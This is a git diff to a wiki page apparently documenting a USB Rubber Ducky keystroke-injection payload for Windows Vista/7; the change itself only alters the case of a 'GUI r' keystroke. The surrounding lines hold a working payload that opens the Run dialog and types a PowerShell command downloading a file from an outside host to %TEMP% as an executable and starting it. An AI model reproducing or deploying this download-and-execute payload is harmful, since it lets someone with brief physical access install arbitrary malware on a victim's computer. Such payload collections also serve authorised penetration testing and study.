diff --git a/Payload---hide-cmd-window.asciidoc b/Payload---hide-cmd-window.asciidoc index 71937f5..36ff1f8 100644 --- a/Payload---hide-cmd-window.asciidoc +++ b/Payload---hide-cmd-window.asciidoc @@ -42,7 +42,7 @@ REM Target: WINDOWS VISTA/7 REM Encoder V2.4 REM Using the run command for a broader OS base. DELAY 3000 -GUI R +GUI r DELAY 1000 STRING powershell (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%TEMP%\bob.exe'); Start-Process "%TEMP%\bob.exe" DELAY 500